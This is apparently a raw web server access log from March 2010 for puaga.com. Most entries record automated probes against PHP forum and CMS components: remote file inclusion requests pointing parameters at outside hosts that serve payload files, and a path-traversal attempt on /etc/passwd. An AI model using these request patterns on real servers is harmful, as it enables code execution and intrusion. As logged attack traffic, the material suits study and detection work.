222.239.227.209 - - [07/Mar/2010:06:44:07 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:06:44:07 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:06:44:21 -0800] "GET /logs/access_100227.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:06:45:05 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:06:45:05 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:06:45:05 -0800] "GET /logs/access_100219.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:06:45:27 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:06:45:27 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:06:45:27 -0800] "GET /logs/access_100224.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:06:45:46 -0800] "GET /logs/access_100214.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:06:46:39 -0800] "GET /logs/access_100210.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:47:14 -0800] "GET /logs/access_100213.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:06:47:39 -0800] "GET /logs/access_100129.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:06:47:43 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:06:47:49 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:06:48:09 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:06:49:19 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:06:49:19 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:06:49:29 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:06:49:29 -0800] "GET /logs/access_100207.log%20%20/phphtml.php?htmlclass_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:06:49:30 -0800] "GET /phphtml.php?htmlclass_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:06:49:30 -0800] "GET /logs/access_100227.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:06:51:20 -0800] "GET /logs/delete_all.php?board_skin_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:06:51:20 -0800] "GET /logs/access_100205.log/delete_all.php?board_skin_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:06:51:20 -0800] "GET /delete_all.php?board_skin_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
220.232.237.122 - - [07/Mar/2010:06:51:49 -0800] "GET /logs/access_100207.log/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gastro-online.ru//components/com_remository/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [07/Mar/2010:06:51:49 -0800] "GET /logs/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gastro-online.ru//components/com_remository/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:06:51:49 -0800] "GET /phphtml.php?htmlclass_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:06:51:50 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:06:51:50 -0800] "GET /logs/access_100207.log%20%20/phphtml.php?htmlclass_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [07/Mar/2010:06:51:50 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gastro-online.ru//components/com_remository/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:06:53:05 -0800] "GET /logs/access_100225.log/delete_all.php?board_skin_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:06:53:11 -0800] "GET /logs/access_100206.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.36.232.169 - - [07/Mar/2010:06:55:27 -0800] "GET /logs///skin/buzzard_espoon/setup.php?dir=http://www.prozesse-im-unternehmen.de/mac/components/com_joomlastats/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.36.232.169 - - [07/Mar/2010:06:55:27 -0800] "GET //skin/buzzard_espoon/setup.php?dir=http://www.prozesse-im-unternehmen.de/mac/components/com_joomlastats/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.36.232.169 - - [07/Mar/2010:06:55:27 -0800] "GET /logs/access_100201.log%20%20///skin/buzzard_espoon/setup.php?dir=http://www.prozesse-im-unternehmen.de/mac/components/com_joomlastats/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.36.232.169 - - [07/Mar/2010:06:55:49 -0800] "GET /logs/access.log%20%20///skin/buzzard_espoon/setup.php?dir=http://www.prozesse-im-unternehmen.de/mac/components/com_joomlastats/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:06:56:51 -0800] "GET /bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:06:56:51 -0800] "GET /logs//bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:06:56:51 -0800] "GET /logs/access_100203.log//bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.181.94.223 - - [07/Mar/2010:06:57:27 -0800] "GET /style/imagehover.js HTTP/1.0" 200 1410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Avant Browser; InfoPath.1; .NET CLR 2.0.50727; .NET CLR1.1.4322)" "puaga.com"
220.80.108.81 - - [07/Mar/2010:06:58:53 -0800] "GET /logs/access_100128.log//bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:06:58:53 -0800] "GET /logs//bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:06:58:53 -0800] "GET /bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:06:59:02 -0800] "GET /logs/access_100214.log//bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [07/Mar/2010:06:59:07 -0800] "GET /logs/access_100219.log%20%20/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [07/Mar/2010:06:59:07 -0800] "GET /write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [07/Mar/2010:06:59:07 -0800] "GET /logs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [07/Mar/2010:06:59:11 -0800] "GET /logs/access_100225.log%20%20/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.55.25.151 - - [07/Mar/2010:07:00:19 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "puaga.com"
65.55.25.151 - - [07/Mar/2010:07:00:19 -0800] "GET /sitemap.xml HTTP/1.1" 200 233 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "puaga.com"
211.210.38.8 - - [07/Mar/2010:07:01:52 -0800] "GET /convert/mvcw.php?vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [07/Mar/2010:07:01:53 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [07/Mar/2010:07:01:53 -0800] "GET /logs/access_100208.log%20%20/convert/mvcw.php?vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [07/Mar/2010:07:02:49 -0800] "GET /logs/access_100204.log%20%20/convert/mvcw.php?vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.154 - - [07/Mar/2010:07:03:51 -0800] "GET /bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.154 - - [07/Mar/2010:07:03:51 -0800] "GET /logs/access_100221.log//bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.154 - - [07/Mar/2010:07:03:51 -0800] "GET /logs//bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:04:01 -0800] "GET /logs/access_100210.log%20%20/index.php?option=com_custompages&cpage=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:04:01 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:04:01 -0800] "GET /index.php?option=com_custompages&cpage=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.154 - - [07/Mar/2010:07:04:20 -0800] "GET /bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.154 - - [07/Mar/2010:07:04:20 -0800] "GET /logs/access_100221.log%20%20//bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.154 - - [07/Mar/2010:07:04:20 -0800] "GET /logs//bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:04:29 -0800] "GET /logs/access_100211.log%20%20/index.php?option=com_custompages&cpage=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:04:43 -0800] "GET /logs/access_100210.log%20%20/index.php?option=com_custompages&cpage=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:04:44 -0800] "GET /index.php?option=com_custompages&cpage=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:04:44 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:05:00 -0800] "GET /logs/access_100205.log%20%20/phphtml.php?htmlclass_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:05:08 -0800] "GET /logs/access_100211.log%20%20/index.php?option=com_custompages&cpage=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.154 - - [07/Mar/2010:07:05:09 -0800] "GET /logs/access_100218.log//bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:05:24 -0800] "GET /logs/access_100205.log%20%20/phphtml.php?htmlclass_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:07:06:47 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:07:06:47 -0800] "GET /logs/access_100212.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:07:06:47 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [07/Mar/2010:07:07:09 -0800] "GET /logs/access.log HTTP/1.0" 200 190918 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
69.16.237.166 - - [07/Mar/2010:07:10:14 -0800] "GET /bbs//delete_all.php?board_skin_path=http://saltlux.com/event/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [07/Mar/2010:07:10:15 -0800] "GET /logs/access_100202.log//bbs//delete_all.php?board_skin_path=http://saltlux.com/event/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [07/Mar/2010:07:10:15 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://saltlux.com/event/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [07/Mar/2010:07:10:15 -0800] "GET /logs/access_100129.log//bbs//delete_all.php?board_skin_path=http://saltlux.com/event/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:11:48 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:11:48 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:11:48 -0800] "GET /logs/access_100205.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:07:12:00 -0800] "GET /logs/access_100225.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:12:02 -0800] "GET /logs/access_100203.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:12:40 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:12:40 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:12:40 -0800] "GET /logs/access_100205.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:12:49 -0800] "GET /logs/access_100203.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:13:13 -0800] "GET /logs/access_100205.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:13:13 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:13:13 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:13:25 -0800] "GET /logs/access_100203.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:13:38 -0800] "GET /logs/access_100217.log%20%20/errors.php?error=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:13:38 -0800] "GET /logs/errors.php?error=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:13:38 -0800] "GET /errors.php?error=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:14:04 -0800] "GET /logs/access_100203.log%20%20/errors.php?error=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.154 - - [07/Mar/2010:07:14:42 -0800] "GET /bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.154 - - [07/Mar/2010:07:14:42 -0800] "GET /logs//bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.154 - - [07/Mar/2010:07:14:42 -0800] "GET /logs/access_100221.log//bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.203.180.144 - - [07/Mar/2010:07:15:50 -0800] "GET /logs/access_100207.log/-DSSL? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
211.203.180.144 - - [07/Mar/2010:07:15:51 -0800] "GET /-DSSL? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
211.203.180.144 - - [07/Mar/2010:07:15:51 -0800] "GET /logs/-DSSL? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
118.129.166.154 - - [07/Mar/2010:07:16:34 -0800] "GET /logs/access_100218.log//bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:07:16:38 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:07:16:38 -0800] "GET /logs/access_100227.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:07:16:38 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.36.232.169 - - [07/Mar/2010:07:16:39 -0800] "GET /logs/access_100201.log///skin/buzzard_espoon/setup.php?dir=http://www.prozesse-im-unternehmen.de/mac/components/com_joomlastats/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.36.232.169 - - [07/Mar/2010:07:16:46 -0800] "GET /logs/access.log///skin/buzzard_espoon/setup.php?dir=http://www.prozesse-im-unternehmen.de/mac/components/com_joomlastats/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.154 - - [07/Mar/2010:07:18:12 -0800] "GET /bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.154 - - [07/Mar/2010:07:18:36 -0800] "GET /bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.154 - - [07/Mar/2010:07:18:36 -0800] "GET /logs/access_100212.log%20%20//bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.154 - - [07/Mar/2010:07:18:36 -0800] "GET /logs//bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:07:19:21 -0800] "GET /logs/access_100210.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [07/Mar/2010:07:20:26 -0800] "GET /lib/ps_include.inc?modulename=http://www.aigleboots.com//administrator/components/com_virtuemart/.../ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
212.241.177.123 - - [07/Mar/2010:07:20:26 -0800] "GET /lib/ps_include.inc?modulename=http://www.aigleboots.com//administrator/components/com_virtuemart/.../ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
212.241.177.123 - - [07/Mar/2010:07:20:26 -0800] "GET /lib/ps_include.inc?modulename=http://www.aigleboots.com//administrator/components/com_virtuemart/.../ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
